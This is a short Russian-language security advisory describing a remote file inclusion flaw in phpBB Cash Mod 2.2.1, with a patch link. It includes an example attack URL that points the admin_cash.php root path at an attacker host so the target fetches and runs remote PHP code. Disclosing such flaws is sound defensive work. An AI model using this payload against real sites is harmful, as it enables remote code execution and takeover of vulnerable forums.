Дата публикации: | 19.11.2004 |
Дата изменения: | 20.10.2006 |
Всего просмотров: | 4596 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: phpBB Cash Mod 2.2.1
Описание: Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример: http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/ URL производителя: xore.ca/viewforum.php?f=2 Решение: Установите обновление: http://www.phpbb.com/phpBB/catdb.php?mode=download&id=539420 |
|
Ссылки: | phpBB Cash Mod Include File Error Lets Remote Users Execute Arbitrary Code |